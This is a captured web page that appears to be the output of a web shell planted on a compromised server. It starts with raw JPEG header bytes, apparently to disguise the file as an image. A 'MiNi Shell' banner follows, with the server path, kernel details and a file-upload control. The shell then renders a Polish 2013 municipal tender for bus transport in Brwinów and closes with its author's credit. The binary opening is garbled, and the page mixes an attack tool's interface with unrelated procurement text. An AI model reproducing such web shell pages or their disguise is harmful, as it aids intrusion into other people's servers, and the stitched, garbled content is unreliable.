JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130122/30724-N-2013.html

<p class="kh_header"><b>Brwinów: ŚWIADCZENIE USŁUG W ZAKRESIE WYKONYWANIA LOKALNEGO TRANSPORTU ZBIOROWEGO OSÓB ZA CZĘŚCIOWĄ ODPŁATNOŚCIĄ GMINY BRWINÓW NA TERENIE GMINY BRWINÓW I ZAKUP BILETÓW SZKOLNYCH MIESIĘCZNYCH DLA DZIECI OBJĘTYCH OBOWIĄZKIEM DOWOŻENIA DO ZESPOŁU SZKÓŁ NR 1 I ZESPOŁU SZKÓŁ OGÓLNOKSZTAŁCĄCYCH W BRWINOWIE Z TERENU GMINY</b><br>
<b>Numer ogłoszenia: 30724 - 2013; data zamieszczenia: 22.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brwinów , ul. Grodziska 12, 05-840 Brwinów, woj. mazowieckie, tel. 7382567, faks 7295940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brwinow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG W ZAKRESIE WYKONYWANIA LOKALNEGO TRANSPORTU ZBIOROWEGO OSÓB ZA CZĘŚCIOWĄ ODPŁATNOŚCIĄ GMINY BRWINÓW NA TERENIE GMINY BRWINÓW I ZAKUP BILETÓW SZKOLNYCH MIESIĘCZNYCH DLA DZIECI OBJĘTYCH OBOWIĄZKIEM DOWOŻENIA DO ZESPOŁU SZKÓŁ NR 1 I ZESPOŁU SZKÓŁ OGÓLNOKSZTAŁCĄCYCH W BRWINOWIE Z TERENU GMINY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest ŚWIADCZENIE USŁUG W ZAKRESIE WYKONYWANIA LOKALNEGO TRANSPORTU ZBIOROWEGO OSÓB ZA CZĘŚCIOWĄ ODPŁATNOŚCIĄ GMINY BRWINÓW NA TERENIE GMINY BRWINÓW I ZAKUP BILETÓW SZKOLNYCH MIESIĘCZNYCH DLA DZIECI OBJĘTYCH OBOWIĄZKIEM DOWOŻENIA DO ZESPOŁU SZKÓŁ NR 1 i  ZESPOŁU SZKÓŁ OGÓLNOKSZTAŁCĄCYCH W BRWINOWIE Z TERENU GMINY na trasie:

Świadczenie usługi w zakresie lokalnego transportu zbiorowego na terenie Gminy Brwinów odbywać się będzie na trasach:
A. Domaniew - Brwinów - Pruszków - Domaniew w dni nauki szkolnej w tym:
a)	trasa  o długości: 27,300 km - (trasa na terenie Gminy Brwinów - 19 km),
b)	trasa o długości: 9 km Brwinów Rynek - ZSO do Parzniewa Działkowa/Akacjowa - (teren Gminy Brwinów),
c)	trasa o długości: 10,6 km Brwinów Urząd Gminy - Pruszków ul. Promyka - (trasa na terenie Gminy Brwinów 8,6 km),

B. Domaniew - Brwinów - Pruszków PKP w dni robocze nie będące dniami nauki szkolnej , oraz w 
sobotę , niedziele i święta w tym:
a)	trasa o długości:  20,4 km - (trasa na terenie  Gminy Brwinów 19 km),
b)	trasa o długości:    8,7 km - (teren Gminy Brwinów),

C. Brwinów - Rokitno - Brwinów w dni nauki szkolnej, w dni robocze nie będące dniami nauki szkolnej, 
oraz w sobotę, niedziele i święta w tym: 
a)	trasa o długości: 19 km - (trasa na  terenie  Gminy Brwinów 17 km)

D. Brwinów - Podkowa Leśna  - Żółwin w dni robocze od poniedziałku do piątku w tym:
a)	trasa o długości: 22 km - (trasa na terenie Gminy Brwinów 17 km),
b)	trasa o długości: 16 km  - (trasa na terenie Gminy Brwinów  13 km),
c)	trasa o długości: 18,5 km - (trasa na terenie Gminy Brwinów 16 km),
d)	trasa o długości: 19 km -  (trasa na terenie Gminy Brwinów 16,5 km),

Uwaga: Trasa przekracza granicę administracyjną gminy Brwinów, ponieważ  nie ma innej możliwości połączenia z Żółwinem i Owczarnią - należącymi do gminy Brwinów (wsie są rozdzielone geograficznie i administracyjnie przez gminę Podkowa Leśna).

Termin realizacji usługi transportu publicznego i usługi dowozu dzieci - 6 miesięcy (od 01.03.2013r. do 31.08.2013r.).
Usługi obejmować będą również dowóz i odwóz dzieci i młodzieży do Zespołu Szkół Nr 1 w Brwinowie przy ul. Piłsudskiego 11 (obecnie 101 dzieci i  5 opiekunów), dowóz i odwóz dzieci z Parzniewa do Zespołu Szkół Nr 2 w Brwinowie przy ul. Żwirowej 16 (obecnie 7 dzieci i 2 opiekunów). Zamawiający zapewnia opiekunów, którzy będą jeździli na trasie dowożenia dzieci do Zespołu Szkół Nr 1 w Brwinowie przy ul. Piłsudskiego 11i Zespołu  Szkół Ogólnokształcących przy ul. Żwirowej 16. 
Transport winien być tak zorganizowany aby zapewnić dzieciom i młodzieży  uczęszczającym do Zespołu Szkół Nr 1 w Brwinowie, dojazd do szkoły na co najmniej 15 minut przed rozpoczęciem lekcji i powrót ze szkoły nie wcześniej niż 5 min po zakończeniu przerwy, oraz zapewnić dojazd do szkoły i powrót dzieci  i młodzieży do Zespołu Szkół Ogólnokształcących w Brwinowie w określonych godzinach.

2. Szczegółowe zasady i wymagania dotyczące świadczenia usług :
2.1. Wymogi odnośnie autobusów:
1) Trasa Domaniew- Brwinów -  Pruszków -Domaniew:
Dzień nauki szkolnej:
- dwa pierwsze kursy i dwa ostatnie (poza godzinami lekcyjnymi) minimum 19 miejsc, w tym min. 15 miejsc siedzących,
- pozostałe kursy ( w godzinach lekcyjnych) minimum 60 miejsc, w tym min. 54 miejsca siedzące.
Istnieje możliwość zmiany  autobusu na mniejszy jeżeli  będzie  dowożona  na tej  linii  mała ilość  dzieci.

2) Trasa: Domaniew - Brwinów - Pruszków PKP:
  - Dzień  roboczy nie będący dniem nauki szkolnej - minimum 19 miejsc, w tym min. 15 miejsc siedzących.
  - Soboty, niedziele i święta - minimum 19 miejsc, w tym min. 15 miejsc siedzących.

3) Trasa Brwinów - Rokitno  - Brwinów:
 a) Dzień nauki szkolnej: 
   - dwa pierwsze kursy i dwa ostatnie (poza godzinami lekcyjnymi) minimum 19 miejsc, w tym min. 15 miejsc siedzących,
   - pozostałe kursy (w godzinach lekcyjnych) minimum 39 miejsc, w tym min. 35 miejsca siedzące.
Istnieje możliwość   zmiany  autobusu na mniejszy jeżeli  będzie  dowożona  na tej  linii  mała ilość  dzieci.

 b) Dzień roboczy nie będący dniem nauki szkolnej - minimum 19 miejsc, w tym min. 15 miejsc siedzących,
 c) Soboty, niedziele i święta - minimum 19 miejsc, w tym min. 15 miejsc siedzących.

4) Trasa Brwinów - Podkowa Leśna - Żółwin:
     Autobus mający minimum19 miejsc, w tym min. 15  miejsc siedzących. 

2.2. Tabor autobusowy nie powinien być starszy niż 15 lat.
2.3.Usługi transportu zbiorowego osób muszą być wykonywane zgodnie ze wszystkimi obowiązującymi w tym zakresie przepisami.
2.4.Środki transportu przeznaczone do realizacji usługi muszą posiadać aktualne badania techniczne.
2.5. Środki transportu przeznaczone do realizacji przedmiotu zamówienia muszą spełniać warunki określone w Rozporządzenie Ministra Infrastruktury z dnia 31 grudnia 2002r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U.z 2003r, nr 32 poz. 262 ze zm.)
2.6.Realizacja przedmiotu zamówienia odbywać się będzie przez osoby posiadające wymagane aktualne uprawnienia.
3. Wykonawca gwarantuje w razie awarii autobusów transport zastępczy, który będzie podstawiony w czasie nie dłuższym niż 60 minut od wystąpienia awarii.
4. Wykonawca zobowiązany jest do ubezpieczenia pojazdów, którymi będą przewożeni uczniowie i pasażerowie, od następstw nieszczęśliwych wypadków i od odpowiedzialności cywilnej.
5. Rozkład jazdy na poszczególnych trasach według wskazanych przystanków, biorąc pod uwagę wskazane godziny w załącznikach nr 8.1, 8.2, 8.3, 8.4 do SIWZ, i uzyskane zezwolenie na prowadzenie regularnych przewozów stanowi załącznik nr 2 do umowy. Wykonawca wybrany przed podpisaniem umowy przedłoży zamawiającemu kserokopię potwierdzoną za zgodność z oryginałem zezwolenia na prowadzenie regularnych przewozów. 
6. Przedmiot umowy obejmuje także sprzedaż Zamawiającemu, przez cały okres obowiązywania umowy maksymalnej ilości 548 cztuk biletów miesięcznych (łącznie dla dzieci i opiekunów), z tym zastrzeżeniem, że od chwili podpisania umowy Zamawiający zakupi co miesiąc średnio:
a) 108 sztuk biletów szkolnych miesięcznych dla dzieci objętych przez Zamawiającego obowiązkiem dowożenia, określonym w art. 17 ust. 3 ustawy z dnia 07 września 1991r. o systemie oświaty (t.j.Dz.U. z 2004r. nr 256, poz. 2572 ze zm), zgodnie z przepisami ustawy z dnia 20.06.1992r. o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (t.j. Dz.U. 2002r. nr 175, poz. 1440  ze zm),
b) 7 sztuk biletów miesięcznych normalnych dla opiekunów. 
6.1. Ilość biletów zakupionych przez Zamawiającego może się zmienić i zmniejszyć nie więcej niż o 20% w odniesieniu do maksymalnej ilości określonej w ust.6. Zakup przez Zamawiającego zmniejszonej ilości biletów niż wymieniona ilość maksymalna, nie może być podstawą żadnych roszczeń ze strony Wykonawcy wobec Zamawiającego. 
6.2 Wykonawca dostarczy Zamawiającemu bilety miesięczne szkolne dla dzieci i bilety dla opiekunów do 20 dnia poprzedzającego miesiąca, na adres wskazany przez Zamawiającego.

7. W trakcie realizacji zadania ceny biletów, nie mogą być wyższe niż wymienione w cennikach stanowiących załączniki nr 10.1, 10.2,10.3 do SIWZ. Ponadto należy zachować wszystkie ulgi dla osób uprawnionych do korzystania z bezpłatnych i ulgowych przewozów. Wpływy z biletów stanowić będą przychód Wykonawcy.
8. Przewóz osób zgodny z ustawa z dnia 6 września 2001r o transporcie drogowym (t.j. Dz. U. z 2012r.,  poz.1265).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67 ust.1 pkt. 6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających na usługę transportową, stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień. Zamówienia uzupełniające będą uregulowane odrębną umową zawartą w trybie z wolnej ręki</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadają licencję na wykonywanie krajowego transportu drogowego osób.
1. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o dostarczone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania. 2. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu: 1) Kserokopia licencji na wykonywanie krajowego transportu drogowego osób. 2) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali lub wykonują usługi transportowe przewozu osób o łącznej wartości min. 200.000 zł brutto, potwierdzone dokumentem o ich należytym wykonaniu lub wykonywaniu; 1.Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o dostarczone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania. 2. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu: 1)  załącznik nr 3 - wykaz usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych lub wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi zostały należycie wykonane;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2)	zmiany terminu realizacji przedmiotu umowy w stosunku do terminu określonego w § 1 ust.9 umowy w przypadku wcześniejszego lub późniejszego wyczerpania wynagrodzenia Wykonawcy, o którym mowa w § 4 ust.3.1 i 4.1. umowy,
3)	zmiany częstotliwości kursów autobusu na poszczególnych trasach komunikacyjnych, tzn. zlikwidowania lub dodania kursu na ustalonej w niniejszej umowie trasie, w zależności od natężenia ruchu pasażerów,  
4)	zmiany w trakcie realizacji zadania:
a)	rozkładu jazdy na danej trasie,
b)	przebiegu tras komunikacyjnych,
c)	przystanków na trasie, 
d)	ilości szkolnych biletów miesięcznych w odniesieniu do liczby dzieci i opiekunów,
5)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.brwinow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY BRWINÓW, 05-840 BRWINÓW, UL.KOŚCIUSZKI 4A, Zespół ds. Zamówień Publicznych, pokój nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2013 godzina 13:00, miejsce: URZĄD GMINY BRWINÓW, 05-840 BRWINÓW, UL. GRODZISKA 12, Biuro Obsługi Interesanta - pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com